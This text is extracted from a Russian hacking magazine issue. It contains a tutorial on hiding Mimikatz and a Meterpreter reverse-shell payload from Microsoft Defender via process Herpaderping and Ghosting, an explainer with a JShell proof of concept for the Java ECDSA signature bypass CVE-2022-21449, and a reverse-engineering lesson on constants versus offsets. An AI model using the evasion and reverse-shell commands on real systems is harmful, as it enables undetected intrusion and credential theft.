книги хакеры / журнал хакер / ха-277_Optimized

ИЗУЧАЕМ ДВА НОВЫХ СПОСОБА СКРЫВАТЬ ПРОЦЕССЫ

ОТ АНТИВИРУСОВ

be_a_saint

T.Hunter hacker's teamlead alexandr.khudozhilov@icloud.c om

Избежать­ обнаруже­ ния­ полезной­ нагрузки­ антивиру­ сами­ — важней­ шая­ задача не только­ вирусописа­ телей­ , но и пен ­ тестеров­ и участни­ ков­ red team. Для этого­ существу­ ют­ раз ­ личные техники­ . Сегодня­ мы подробно­ рассмот­ рим­ две из них: Herpaderping и Ghosting. О двух других­ методиках­ — Hollowing и Doppelgänging — можно­ почитать в статье «Мас ­

кируем­ запуск процес­ сов­ при помощи Process Doppelgänging».

Для простоты­ в наших эксперимен­ тах­ мы будем использовать­ Microsoft Defender и Mimikatz.

ОСОБЕННОСТИ ПРОЦЕССОВ

Как антивирус­ узнает­ , что в системе­ был запущен какой либо процесс­ ? Microsoft дает возможность­ разработ­ чикам­ антивирус­ ных­ решений получать через API нужные­ им события (например­ ,

PsSetCreateProcessNotifyRoutineEx). Когда­ создает­ ­ся процесс­ , Microsoft Defender (да и все остальные­ антивиру­ ­сы) сразу­ узнает­ об этом, получив соответс­ ­тву­ющий callback. Теперь то он может проинспек­ ­тировать исполня ­ емый файл и сделать­ вывод, разрешить­ этот процесс­ или нет (опустим­ этап статичес­ ­кого анализа­ ).

Вся штука­ в том, что уведом­ ление­ CreateProcessNotify— ни разу не про создание­ процес­ са­ . Callback полетит тогда­ , когда­ внутри­ этого­ процес­ са­ воз ­ никнет первый­ поток (thread). Между­ моментами­ , когда­ процесс­ был создан­

и когда­ антивирус­ ­ное решение об этом узнало­ , образует­ ­ся промежу­ ­ток. Это самое время­ злоумыш­ ­ленни­ки творчески­ используют­ для своих­ целей.

Создание процесса

Рассмот­ ­рим создание­ процес­ ­са по шагам.

1.Сначала­ мы получаем­ дескрип­ ­тор (handle) для исполняемо­ ­го файла­ , который запускаем­ , например­ так: hFile = CreateFile(“C:\ Windows\System32\svchost.exe”).

2.Создаем­ image section (например­ , hSection = NtCreateSection( hFile, SEC_IMAGE)). Image section представ­ ­ляет собой особый­ раздел­

и служит­ для отображения­ файла­ (или части­ файла­ ) в память. Раздел­ соот ­ ветству­ ­ет PE-файлам­ и может быть создан­ только­ в них.

3.Создаем­ процесс­ в image section (например­ , hProcess = NtCreateProcessEx(hSection)).

4.Назнача­ ­ем аргумен­ ­ты и переменные­ среды­ (например­ ,

CreateEnvironmentBlock/NtWriteVirtualMemory).

5.Создаем­ поток для выполнения­ процес­ ­са (например­ ,

NtCreateThreadEx).

Сканирование процесса в поисках зловреда

Как уже было сказано­ , антивиру­ ­сы могут получать уведом­ ­ления о событиях­ создания­ процес­ ­сов и потоков (PsSetCreateProcessNotifyRoutineEx и PsSetCreateThreadNotifyRoutineEx).

Выглядит­ это пример­ но­ так:

typedef struct _PS_CREATE_NOTIFY_INFO {

SIZE_T Size;

union {

ULONG Flags;

struct {

ULONG FileOpenNameAvailable : 1;

ULONG IsSubsystemProcess : 1;

ULONG Reserved : 30;

};

};

HANDLE ParentProcessId;

CLIENT_ID CreatingThreadId;

struct _FILE_OBJECT *FileObject;

PCUNICODE_STRING ImageFileName;

PCUNICODE_STRING CommandLine;

NTSTATUS CreationStatus;

} PS_CREATE_NOTIFY_INFO, *PPS_CREATE_NOTIFY_INFO;

Из интерес­ ­ного: FILE_OBJECT соответс­ тву­ ет­ дескрип­ тору­ NtCreateSection. Если же мы взглянем­ на API NtCreateProcess, то увидим­ там тоже дескрип­ ­ тор раздела­ , а не файла­ .

NTSYSCALLAPI

NTSTATUS

NTAPI

NtCreateProcess(

_Out_ PHANDLE ProcessHandle,

_In_ ACCESS_MASK DesiredAccess,

_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,

_In_ HANDLE ParentProcess,

_In_ BOOLEAN InheritObjectTable,

_In_opt_ HANDLE SectionHandle,

_In_opt_ HANDLE DebugPort,

_In_opt_ HANDLE ExceptionPort

);

ОТЛИЧИЯ ДВУХ ТЕХНИК

Для простоты­ я свел отличия­ описыва­ ­емых в статье техник­ в таблицу­ .

HERPADERPING

Нам потребу­ ­ется mimikatz.exe, целевой исполняемый­ файл (тут можно­ ука ­ зывать что угодно­ , у нас это будет hack.exe) и любой файл, не вызывающий­ подозрений­ у антивирус­ ­ных программ­ . Разберем­ методику­ Herpaderping по шагам.

1.Write. Создаем­ и открываем­ hack.exe, копируем­ в него mimikatz.exe, дескрип­ ­тор не закрыва­ ­ем.

2.Map. Создаем­ image section и мапим содержимое­ в память.

3.Modify. Создаем­ процесс­ с дескрип­ ­тором ранее созданно­ ­го раздела­ . После­ этого­ меняем­ содержимое­ файла­ hack.exe, копируя туда что нибудь легитимное­ . Помнишь­ важный­ момент из раздела­ про соз ­ дание процес­ ­са? Так вот это он и есть: с этого­ момента­ то, что у нас в памяти, и то, что хранит­ ­ся в файле­ , отличает­ ­ся.

4.Execute. Создаем­ initial thread. Только­ сейчас­ антивиру­ ­су летит process creation callback. Различие­ содержимого­ в файле­ и в памяти сводит­ с ума Defender, он не может понять, можно­ ли разрешать­ выполнение­ этого­ про ­ цесса­ .

5.Close. Закрыва­ ­ем открытый­ дескрип­ ­тор.

Herpaderping на практике

За всеми­ действи­ ями­ будет наблюдать­ полностью­ обновленный­ Microsoft Defender. Естествен­ но­ , если дропнуть­ на диск Mimikatz или пейлоад­

из MSFvenom в «чистом­ » виде, он тут же будет обнаружен­ антивиру­ ­сом. Нам нужно­ обойти­ статичес­ ­кий анализ­ , но этот этап мы сейчас­ рассмат­ ­ривать не будем.

Defender

Копиру­ ем­ проект­ из GitHub и собираем­ его.

git clone https://github.com/jxy-s/herpaderping.git

cd .\herpaderping\

git submodule update --init –recursive

Копиру­ ем­ проект­

Выпол­ няем­ команду­

ProcessHerpaderping.exe mimikatz.exe hack.exe lsass.exe

Выпол­ нение­ ProcessHerpaderping.exe

Как мы видим, все выполнилось­ успешно, Defender не среаги­ ровал­ . Давай взглянем­ , что покажет нам ProcessHacker.

ProcessHacker

У нас исполняется­ не mimikatz.exe, а hack.exe. А еще у нашего приложе­ ния­ hack.exe есть сертификат­ , выданный­ Microsoft.

У нашего приложе­ ния­ есть сертификат­

Ну а сам hack.exe спокой­ но­ лежит на рабочем столе­ .

Рабочий­ стол

Этот прием­ работает­ не только­ с Mimikatz: давай пробросим­ себе сессию­ Meterpreter. Для этого­ сгенери­ руем­ полезную­ нагрузку­ и запустим­ листенер­ .

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.197

LPORT=9001 -f exe > met.exe

Payload generation

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.197

set LPORT 9001

exploit

Выпол­ ним­ те же действия­ и глянем­ , прилете­ ла­ ли сессия­ .

Выпол­ нение­ met.exe

Получен­ ная­ сессия­

Ура, получилось­ !

GHOSTING

Для использования­ этого­ метода нам опять же потребу­ ­ется наш исходный файл (mimikatz.exe) и целевой исполняемый­ файл. В качестве­ такового­ можно­ указывать­ что угодно­ , у нас это будет уже привыч­ ­ный нам hack.exe. Как и в прошлый­ раз, разберем­ технологию­ по шагам.

1.Delete pending. Delete Pending — это состояние­ , при котором файл еще не удален­ , потому что дескрип­ ­тор на него открыт. Как только­ дескрип­ ­ тор закроет­ ­ся, файл удалит­ ­ся. Создаем­ файл и переводим­ в состояние­ delete-pending, используя­ NtSetInformationFile ( FileDispositionInformation). Использование­ FILE_DELETE_ON_CLOSE не удалит­ файл.

2.Write. Копируем­ наш исходный исполняемый­ файл в созданный­ файл. Содержимое­ не сохраня­ ­ется, так как файл находится­ в состоянии­ deletepending. Также­ это состояние­ блокиру­ ­ет попытки­ открыть файл извне.

3.Map. Создаем­ image section и мапим содержимое­ в память.

4.Сlose(delete). Закрыва­ ­ем дескрип­ ­тор, файл удаляет­ ­ся.

5.Execute. Создаем­ процесс­ с дескрип­ ­тором ранее созданно­ ­го раздела­ . Создаем­ initial thread. В этот момент антивиру­ ­су направля­ ­ется process creation callback, но файл уже удален­ . Попытка­ открыть его завершится­

с ошибкой­ STATUS_FILE_DELETED. Если попробовать­ открыть файл до того, как он будет удален­ , получишь ту же самую ошибку­ .

Ghosting на практике

Копиру­ ­ем проект­ и собираем­ . Либо качаем­ уже собранный­ проект­ из GitHub. Выпол­ ­няем команду­

proc_ghost64.exe mimikatz.exe hack.exe

Выпол­ нение­ proc_ghost64.exe

Как мы видим, снова­ все выполнилось­ успешно и Defender не среаги­ ровал­ . Теперь давай оценим­ информацию­ , которую предос­ тавит­ нам ProcessHacker.

ProcessHacker

Стоит­ обратить­ внимание­ на еще один инстру­ мент­ , который реализует­ дан ­ ную технику­ , — KingHamlet. Он также­ реализует­ возможнос­ ти­ криптования­ исходного­ пейлоада­ :

KingHamlet.exe mimikatz.exe key

KingHamlet

А process ghosting использует­ ся­ на следующем­ шаге:

KingHamlet.exe mimikatz.exe.khe key hack.exe

KingHamlet

KingHamlet также­ отработал­ успешно. В ProcessHacker мы увидим­ сле ­ дующее.

ProcessHacker после­ примене­ ния­ KingHamlet

ВЫВОДЫ

Поведе­ ­ние Microsoft по отношению­ к описан­ ­ным в этой статье методам не до конца­ понятно­ . То компания­ заявляет­ , что выпустила­ закрыва­ ­ющий патч, то

Microsoft Security Response Center (MSRC) неожидан­ но­ сообщает­ : проблема­

не соответс­ ­тву­ет критери­ ­ям, требующим­ выпустить­ обновление­ безопас ­ ности или инструк­ ­ции по предот­ ­вра­щению атак. Но как видим, пока эти механизмы­ работают­ без каких либо трудностей­ , главное­ — обойти­ статичес­ ­ кий анализ­ .

КРИТИЧЕСКАЯ УЯЗВИМОСТЬ

ВJAVA ПОЗВОЛЯЕТ ПОДДЕЛЫВАТЬ

ЭЛЕКТРОННЫЕ ПОДПИСИ И КЛЮЧИ

Валентин Холмогоров valentin@holmogorov.ru

Всех, кто использует­ относитель­ но­ новые версии­ Javaфреймвор­ ка­ Oracle, в минувшую­ среду­ ждал неприят­ ный­ сюрприз­ . Исследова­ тель­ из компании­ ForgeRock Нил Мэд ­ ден сообщил­ о критичес­ кой­ уязвимос­ ти­ в Java, которая поз ­ воляет­ злоумыш­ ленни­ кам­ легко­ подделывать­ сертифика­ ты­

иподписи­ TLS, сообщения­ двухфактор­ ­ной аутентифика­ ­ции

иучетные­ данные­ авториза­ ­ции. Эксперт опубликовал­ в сети подробное­ описание­ уязвимос­ ­ти, с основными­ тезисами­

которого­ мы сегодня­ хотим тебя познакомить­ .

Нил Мэдден­ обнаружил­ эту ошибку­ в OpenJDK еще 11 ноября­ 2021 года и сразу­ же сообщил­ о ней в Oracle. 18 ноября­ разработ­ чик­ подтвер­ дил­ наличие проблемы­ и пообещал­ добавить исправление­ в следующее­ кри ­ тическое­ обновление­ безопасности­ , которое вышло­ 19 апреля­ 2022 года.

Вэтот же день ForgeRock опубликовал­ отчет с описани­ ­ем уязвимос­ ­ти.

Впопулярном­ британ­ ­ском телесериале­ «Доктор­ Кто» есть повторя­ ­ющий­ся сюжет: главный­ герой с успехом­ выпутывает­ ­ся из различных­ неприят­ ­ностей, показывая­ окружающим­ совершенно­ пустой­ документ, изготов­ ­ленный из спе ­ циальной­ «психобу­ ­маги». Эта бумага заставля­ ­ет смотрящего­ на нее человека­ видеть то, что хочет продемонс­ ­три­ровать ему владелец­ артефак­ ­та: пропуск­ ,

удостовере­ ние­ полицейско­ го­ , судебный­ ордер или что то иное. Схожим­ образом­ работает­ уязвимость­ , обнаружен­ ная­ в несколь­ ких­ недавних­ выпус ­ ках Java, вернее­ , в механизме­ широко используемо­ го­ алгорит­ ма­ с открытым­ ключом­ для создания­ цифровых­ подписей­ ECDSA. Этой уязвимос­ ти­ , получив ­

шей обозначение­ CVE-2022-21449, подверже­ ны­ версии­ Java 15, 16, 17 и 18,

вышедшие­ до критичес­ ­кого обновления­ от апреля­ 2022 года. Кроме­ того, в официаль­ ­ном сообщении­ Oracle также­ упомина­ ­ются более старые­ версии­ Java, включая­ 7, 8 и 11. С другой­ стороны­ , в рекомен­ ­даци­ях OpenJDK перечислены­ только­ версии­ 15, 17 и 18, затронутые­ этой конкрет­ ­ной уяз ­ вимостью.

С использовани­ ­ем CVE-2022-21449 злоумыш­ ­ленни­ки могут легко­ подделать­ некоторые­ типы SSL-сертифика­ ­тов и SSL-рукопожатий­ , что, в свою очередь­ , позволя­ ­ет перехватывать­ и изменять­ сообщения­ . Кроме­ того, становит­ ­ся возможной­ подмена­ подписан­ ­ных JSON Web Tokens (JWT), данных­ SAML, токенов идентифика­ ­ции OIDC и даже сообщений­ аутентифика­ ­ции WebAuthn. Фактичес­ ­ки это и есть полный­ аналог­ киношной­ «психобу­ ­маги», только­ в электрон­ ­ной форме­ .

Серьезность­ этой проблемы­ трудно­ недооце­ ­нить. Если ты используешь­ подписи­ ECDSA для любого из перечисленных­ механизмов­ безопасности­ , а на сервере­ установ­ ­лена уязвимая­ версия­ Java, злоумыш­ ­ленник может без труда­ обойти­ эти механизмы­ . В реальнос­ ­ти почти­ все устройства­

WebAuthn/FIDO (включая­ Yubikeys) используют­ подписи­ ECDSA, а многие­ пос ­

тавщики­ OIDC — токены JWT, подписан­ ­ные тем же методом.

Oracle присвоила­ этому­ CVSS оценку­ 7,5 балла­ , посчитав­ , что уязвимость­ не оказыва­ ет­ серьезно­ го­ влияния­ на конфиден­ циаль­ ность­ или доступность­

данных­ , однако­ исследова­ ­тели из ForgeRock оценили­ проблему­ в 10 баллов­ из за широкого­ спектра­ воздей­ ­ствий на различные­ функции­ в контек­ ­сте управления­ доступом­ . Как же все таки работает­ уязвимость­ CVE-2022-21449? Чтобы­ разобрать­ ­ся, необходимо­ немного­ углубить­ ­ся в теорию.

ПОДПИСИ ECDSA

ECDSA расшифро­ выва­ ется­ как алгоритм­ цифровой­ подписи­ на эллиптичес­ ­

ких кривых­ (Elliptic Curve Digital Signature Algorithm) и широко использует­ ­ся в качестве­ стандарта­ для подписи­ всех видов цифровых­ документов­ . По срав ­ нению со старым­ стандартом­ RSA ключи­ и подписи­ на основе­ эллиптичес­ ­кой криптогра­ ­фии имеют­ намного­ меньшие­ размеры­ в байтах­ , но при этом обес ­ печивают­ эквивален­ ­тную безопасность­ , в результате­ чего они применя­ ­ются в тех случаях­ , когда­ размер­ имеет­ большое­ значение­ . Например­ , стандарт­ WebAuthn для двухфактор­ ­ной аутентифика­ ­ции позволя­ ­ет произво­ ­дите­лям устройств­ выбирать из широкого­ спектра­ алгорит­ мов­ создания­ подписи­ , но на практике­ почти­ все произве­ ден­ ные­ на сегодняшний­ день устройства­ поддержи­ вают­ только­ ECDSA (заметным­ исключени­ ем­ является­ разве­ что Windows Hello, которая использует­ RSA, предположи­ тель­ но­ для совмести­ мос­ ­ ти со старым­ оборудо­ вани­ ем­ TPM).

Не вдаваясь­ в техничес­ ­кие детали, можно­ сказать­ , что подпись­ ECDSA состоит­ из двух значений­ , называемых­ r и s. Чтобы­ проверить­ такую подпись­ , верификатор­ решает­ уравнение­ , включающее­ значения­ r, s, открытый­ ключ подписав­ ­шего и хеш сообщения­ . Если две части­ уравнения­ равны­ , подпись­ считает­ ­ся действи­ ­тель­ной, в против­ ­ном случае­ она отклоняет­ ­ся.

Одна­ часть уравнения­ должна­ быть равна­ r, а другая­ часть умножает­ ся­ на r и значение­ , полученное­ из s. Очевид­ но­ , было бы очень плохо­ , если бы r и s оказались­ равны­ 0, потому что тогда­ мы проверя­ ли­ бы равенство­ 0 = 0 [куча вещей], которое будет истинным независимо­ от значения­ «кучи вещей». Притом­ что эта самая «куча вещей» — важные­ данные­ , такие как сообщение­

и открытый­ ключ. Вот почему самая первая­ провер­ ­ка в алгорит­ ­ме ECDSA выполняет­ ­ся с целью удостоверить­ ­ся, что значения­ r и s >= 1.

Догадай­ ся­ , какую провер­ ку­ забыли в Java? Бинго­ : валидатор­ подписи­ ECDSA в Java не проверял­ , равны­ ли r или s нулю, поэтому­ ты при желании можешь создать­ подпись­ с нулевыми­ значени­ ями­ этих параметров­ . Тогда­ Java примет­ такую подпись­ для любого сообщения­ или публично­ го­ ключа­ как действи­ тель­ ную­ .

Вот интерак­ ­тивный сеанс JShell, показывающий­ реализацию­ этой уяз ­ вимости­ , — здесь использует­ ­ся абсолют­ ­но пустая­ подпись­ , которая при ­ нимается­ в качестве­ действи­ ­тель­ной:

|Welcome to JShell -- Version 17.0.10

| For an introduction type: /help intro0

jshell> import java.security.*

jshell> var keys = KeyPairGenerator.getInstance("EC").generateKeyPair

()

keys ==> java.security.KeyPair@626b2d4a0

jshell> var blankSignature = new byte[64]0

blankSignature ==> byte[64] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

0, ... , 0, 0, 0, 0, 0, 0, 0, 0 }

jshell> var sig = Signature.getInstance(

"SHA256WithECDSAInP1363Format")

sig ==> Signature object: SHA256WithECDSAInP1363Format<not

initialized>0

jshell> sig.initVerify(keys.getPublic())

jshell> sig.update("Hello, World".getBytes())

jshell> sig.verify(blankSignature)

$8 ==> true

// Oops, that shouldn't have verified...

Квалифи­ катор­ InP1363Format упрощает­ демонстра­ цию­ ошибки­ . Подписи­

в формате­ ASN.1 DER могут использовать­ ся­ таким же образом­ : просто­ сна ­ чала нужно­ немного­ повозиться­ с кодировкой­ . Но обрати­ внимание­ , что JWT и другие­ стандарты­ применя­ ют­ необработан­ ный­ формат­ IEEE P1363.

НЕМНОГО ТЕХНИЧЕСКИХ ДЕТАЛЕЙ

Если­ не полениться­ и почитать в Википедии­ подробнос­ ти­ о принципах­ работы ECDSA, можно­ обнаружить­ , что правая­ часть уравнения­ умножает­ ся­ не на s,

а скорее­ на его обратный мультип­ ­ликатор: s -1. Если ты немного­ разбира­ ­ешь ­ ся в математике­ , ты можешь задаться­ вопросом­ : разве­ вычисление­ этого­ обратного­ результата­ не приведет­ к делению на ноль? Но в криптогра­ ­фии на основе­ эллиптичес­ ­ких кривых­ эта обратная величина­ вычисляет­ ­ся по модулю большого­ числа­ , n, а для кривых­ , обычно­ используемых­ в ECDSA, n является­ простым­ числом­ , поэтому­ мы можем использовать­ малую теорему­ Ферма­ для вычисления­ обратного­ модульного­ значения­ :

xn = x1 = x(mod n)

n), мы получим тот же эффект, как если бы r и s были равны­ нулю.

Еще одна провер­ ­ка, которая могла­ бы спасти­ Java, — это провер­ ­ка того, что точка­ , вычисленная­ из r и s, не является­ «бесконеч­ ­но удален­ ­ной точкой­ ». Если r и s равны­ нулю, то результиру­ ­ющая точка­ фактичес­ ­ки будет точкой­

в бесконеч­ ности­ . Но, как ты уже, наверное­ , догадался­ , Java не выполняет­ и эту провер­ ку­ .

ПОЧЕМУ УЯЗВИМОСТЬ ОБНАРУЖИЛИ ТОЛЬКО СЕЙЧАС?

Широко­ известно­ , что Java уже давно­ поддержи­ вает­ ECDSA. Всегда­ ли реализация­ этого­ алгорит­ ма­ была уязвимой­ и почему о проблеме­ стало­ известно­ только­ сейчас­ ?

Иссле­ ­дова­тели из ForgeRock считают­ , что это относитель­ ­но недавняя­ ошибка­ , вызванная­ переписыва­ ­нием кода EC с нативного­ C++ на Java, что произош­ ­ло в версии­ Java 15. Хотя, по мнению­ специалис­ ­тов, эта переделка­ дает преиму­ ­щес­тва с точки­ зрения­ безопасности­ памяти, похоже, в ее реали ­ зации не участво­ ­вали эксперты­ в области криптогра­ ­фии. Исходная версия­ на C++ не содержит­ этих ошибок­ , но переписан­ ­ная реализация­ уже имеет­ уязвимость­ . Ни одна из отправив­ ­шихся в релиз версий­ Java, по видимому­ , не была полностью­ покрыта­ тестами­ , ведь даже самое беглое­ прочтение­ спе ­ цификации­ ECDSA предполага­ ­ет как минимум провер­ ­ку на предмет­ откло ­ нения недопустимых­ значений­ r и s. В общем, обнаружив­ ­шие уязвимость­ исследова­ ­тели не уверены­ , что в этом коде не скрывают­ ­ся и другие­ критичес­ ­ кие ошибки­ .

ЧТО ТЕПЕРЬ ДЕЛАТЬ?

Если­ ты используешь­ Java 15 или более позднюю­ версию­ , незамедлитель­ ­но обнови­ ее или установи­ критичес­ ­кий патч безопасности­ от Oracle.

Криптогра­ фичес­ кий­ код очень сложно­ реализовать­ правиль­ но­ , а алгорит­ мы подписи­ с открытым­ ключом­ —среди­ самых сложных­ . ECDSA сам по себе весьма­ ненадежный­ алгоритм­ , где даже­ небольшая­ погрешность­ в одном случай­ ном­ значении­ может позволить­ полностью­ восста­ новить­ твой закрытый­ ключ.

С другой­ стороны­ , теперь существу­ ют­ отличные ресурсы­ , такие как Project Wycheproof, которые предос­ тавля­ ют­ тестовые­ примеры­ для известных­ уяз ­ вимостей­ . После­ того как эксперты­ ForgeRock обнаружи­ ли­ эту ошибку­ , они обновили­ локальную­ копию Wycheproof для работы с Java 17 — и она сразу­ же обнаружи­ ла­ проблему­ . Хочется­ верить, что команда­ JDK сама начнет­ исполь ­ зовать набор тестов­ Wycheproof, чтобы­ в будущем подобные­ ошибки­ не попадали­ в паблик­ .

Когда­ мы занимаемся­ анализом­ ломаемой­ программы­ , пытаясь­ восста­ ­новить алгоритм­ ее работы, нам нужно­ опре ­ делить типы операн­ ­дов ассемблер­ ­ных инструк­ ­ций. Для этого­ есть несколь­ ­ко простых­ правил­ . Между­ тем среди­ операн­ ­дов присутс­ ­тву­ют констан­ ­ты и смещения­ , которые внешне­ очень похожи, но в то же время­ сильно­ различа­ ­ются по способам­ и целям взаимо­ ­дей­ствия. Поэтому­ важно­ отделить­ одно

от другого­ , так как такие «игры» — один из главных­ инстру­ ­ ментов­ разработ­ ­чиков защит.

Пятнадцать­ лет назад эпичес­ ­кий труд Криса­ Каспер­ ­ски «Фундамен­ ­таль­ные основы­ хакерства­ » был настоль­ ­ной книгой­ каждого­ начинающе­ ­го исследова­ ­ теля в области компьютер­ ­ной безопасности­ . Однако­ время­ идет, и знания­ , опубликован­ ­ные Крисом­ , теряют­ актуаль­ ­ность. Редакторы­ «Хакера» попыта ­ лись обновить­ этот объемный­ труд и перенести­ его из времен­ Windows 2000 и Visual Studio 6.0 во времена­ Windows 10 и Visual Studio 2019.

Ссылки­ на другие­ статьи из этого­ цикла­ ищи на странице­ автора­ .

ИДЕНТИФИКАЦИЯ КОНСТАНТ И СМЕЩЕНИЙ

Микропро­ ­цес­соры серии 80x86 поддержи­ ­вают операн­ ­ды трех типов: регистр, непосредс­ ­твен­ное значение­ , непосредс­ ­твен­ный указатель­ . Тип операн­ ­да явно задается­ в специаль­ ­ном поле машинной­ инструк­ ­ции, именуемом­ mod, поэтому­ никаких проблем­ в идентифика­ ­ции типов операн­ ­дов не возника­ ­ет. Регистр — ну, все мы знаем­ , как выглядят­ регистры­ ; указатель­ по общепри ­ нятому­ соглашению­ заключа­ ­ется в квадратные­ скобки­ , а непосредс­ ­твен­ное значение­ записывает­ ­ся без них. Например­ :

Кроме­ этого­ , микропро­ цес­ соры­ серии 80x86 поддержи­ вают­ два вида адре ­ сации памяти: непос­ редс­ твен­ ную­ и косвенную­ . Тип адресации­ определя­ ется­ типом указате­ ля­ . Если операнд­ — непосредс­ твен­ ный­ указатель­ , то и адре ­ сация непосредс­ твен­ на­ . Если же операнд­ указатель­ — регистр, то такая адресация­ называется­ косвенной­ . Например­ :

Для инициали­ зации­ регистро­ вого­ указате­ ля­ разработ­ чики­ микропро­ цес­ сора­ ввели­ специаль­ ную­ команду­ , вычисляющую­ значение­ адресного­ выражения­ addr и присваивающую­ его регистру­ REG, — LEA REG, [addr]. Например­ :

Правый­ операнд­ команды­ LEA всегда­ представ­ ляет­ собой ближний­ (near) ука ­ затель (исключение­ составля­ ют­ случаи­ использования­ LEA для сложения­ кон ­ стант — подробнее­ об этом см. в одноимен­ ном­ пункте­ ). И все было бы хорошо... да вот, оказыва­ ется­ , внутреннее­ представ­ ление­ ближнего­ указате­ ­ ля эквивален­ тно­ констан­ те­ того же значения­ . Отсюда­ LEA EAX, [0x401020] равносиль­ но­ MOV EAX, 0x401020. В силу определен­ ных­ причин­ MOV зна ­ чительно­ обогнал­ в популярности­ LEA, практичес­ ки­ вытеснив­ последнюю­ инс ­ трукцию­ из употребле­ ния­ .

Отказ­ от LEA породил фундамен­ таль­ ную­ проблему­ ассембли­ рова­ ния­ — проблему­ OFFSET’a. В общих чертах­ ее суть заключа­ ется­ в синтакси­ чес­ кой­ неразличимос­ ти­ констант­ и смещений­ (ближних­ указате­ лей­ ). Конструк­ ция­ MOV EAX, 0x401020 может грузить­ в EAX и констан­ ту­ , равную­ 0x401020 (пример­ соответс­ тву­ юще­ го­ C-кода: a=0x401020), и указатель­ на ячейку­ памяти, рас ­ положенную­ по смещению­ 0x401020 (пример­ соответс­ тву­ юще­ го­ C-кода: a=&x). Согласись­ , a=0x401020 совсем­ не одно и то же, что a=&x! А теперь представь­ , что произой­ дет­ , если в повторно­ ассембли­ рован­ ной­ программе­ переменная­ х окажет­ ся­ расположе­ на­ по иному­ смещению­ , а не 0x401020? Правиль­ но­ — программа­ рухнет­ , ибо указатель­ a по прежнему­ указыва­ ет­ на ячейку­ памяти 0x401020, но здесь теперь «прожива­ ет­ » совсем­ другая­ переменная­ !

Почему­ переменная­ может изменить­ свое смещение­ ? Основных причин­ тому две. Во первых­ , язык ассембле­ ­ра неоднозна­ ­чен и допускает­ двоякую­ интерпре­ ­тацию. Например­ , конструк­ ­ции ADD EAX, 0x66 соответс­ ­тву­ют две машинные­ инструк­ ­ции: 83 C0 66 и 05 66 00 00 00 длиной­ три и пять байт соответс­ ­твен­но. Трансля­ ­тор может выбрать­ любую из них, и не факт, что ту же самую, которая была в исходной программе­ (до дизассем­ ­бли­рова­ния). Неверно­ «угадан­ ­ный» размер­ вызовет смещение­ всех остальных­ инструк­ ­ций, а вместе­ с ними и данных­ . Во вторых­ , смещение­ не замедлит­ вызвать­ модификацию­ программы­ (разумеется­ , речь идет не о замене JZ на JNZ, а о настоящей­ адаптации­ или модернизации­ ), и все указате­ ­ли тут же «посып ­ лются».

Вернуть­ работоспособ­ ность­ программы­ помогает­ директива­ offset. Если MOV EAX, 0x401020 действи­ тель­ но­ загружа­ ет­ в EAX указатель­ , а не констан­ ­ ту, по смещению­ 0x401020 следует­ создать­ метку­ , именуемую­ , скажем­ , loc_401020. Также­ нужно­ MOV EAX, 0x401020 заменить на MOV EAX, offset loc_401020. Теперь указатель­ EAX связан­ не с фиксирован­ ным­ смещени­ ем­ ,

ас меткой­ !

Ачто произой­ ­дет, если предварить­ директивой­ offset констан­ ­ту, ошибоч­ ­

но приняв­ ее за указатель­ ? Программа­ откажет­ или станет­ работать некор ­ ректно­ . Допустим­ , число­ 0x401020 выражало­ собой объем­ бассей­ на­ , в который вода втекает­ через одну трубу­ , а вытекает­ через другую­ . Если заменить констан­ ту­ указате­ лем­ , то объем­ бассей­ на­ станет­ равен... сме ­ щению метки­ в заново ассембли­ рован­ ной­ программе­ и все расчеты­ полетят к черту­ .

Таким­ образом­ , очень важно­ определить­ типы всех непосредс­ твен­ ных­ операн­ дов­ , и еще важнее­ определить­ их правиль­ но­ . Одна ошибка­ может сто ­ ить программе­ жизни­ (в смысле­ работоспособ­ ности­ ), а в типичной­ прог ­ рамме тысячи и десятки­ тысяч операн­ дов­ !

Отсюда­ возника­ ­ет два вопроса­ :

•Как вообще­ определя­ ­ют типы операн­ ­дов?

•Можно­ ли их определять­ автомати­ ­чес­ки (или на худой конец хотя бы полу ­ автомати­ ­чес­ки)?

Типы­ операн­ дов­

Определение типа непосредственного операнда

Непос­ редс­ твен­ ный­ операнд­ команды­ LEA всегда­ указатель­ (исключение­ сос ­ тавляют­ ассемблер­ ные­ «извращения­ »: чтобы­ сбить хакеров с толку­ , в некото ­ рых защитах LEA используют­ ся­ для загрузки­ констан­ ты­ ).

Непос­ ­редс­твен­ные операн­ ­ды команд MOV и PUSH могут быть как констан­ ­ тами, так и указате­ ­лями. Чтобы­ определить­ тип непосредс­ ­твен­ного операн­ ­да, необходимо­ проана­ ­лизи­ровать, как использует­ ­ся его значение­ в программе­ . Для косвенной­ адресации­ памяти — это указатель­ , в против­ ­ном случае­ — констан­ ­та.

Например­ , мы встретили­ в тексте­ программы­ команду­ MOV EAX, 0x401020. Что это такое: констан­ та­ или указатель­ ?

Типы­ адресаций­

Ответ­ на вопрос­ дает строка­ MOV ECX, [EAX], подска­ зыва­ ющая­ , что зна ­ чение 0x401020 использует­ ся­ для косвенной­ адресации­ памяти. Следова­ ­ тельно­ , непосредс­ твен­ ный­ операнд­ не что иное, как указатель­ .

Сущес­ тву­ ет­ два типа указате­ лей­ — указате­ ли­ на данные­ и указате­ ли­ на функцию­ . Указате­ ли­ на данные­ используют­ ся­ для извлечения­ значения­ ячейки­ памяти и встречают­ ся­ в арифметичес­ ких­ командах­ и командах­ пересылки­ (например­ , MOV, ADD, SUB). Указате­ ли­ на функцию­ используют­ ся­ в командах­ косвенно­ го­ вызова и реже в командах­ косвенно­ го­ перехода­ — CALL и JMP соответс­ твен­ но­ .

Следующий­ пример­ (const_pointers_cb) откомпилируй­ с помощью C++Builder. В нем мы изучим­ разницу­ между­ констан­ ­тами и указате­ ­лями:

int _tmain(int argc, _TCHAR* argv[])

{

static int a = 0x777;

int* b = &a;

int c = b[0];

}

Резуль­ тат­ компиляции­ должен­ выглядеть­ приблизитель­ но­ так:

Название­ смещения­ unk_451110 говорит о том, что значение­ по адресу­ 451110 имеет­ неопределен­ ­ный тип.

Перей­ ­дем по нему и посмотрим­ , что там находится­ .

Так как число­ 0x777 не умещает­ ся­ в одном байте­ , компилятор­ разместил­ его в двух байтах­ . Следова­ тель­ но­ , в RAX помещается­ ссылка­ на это число­ .

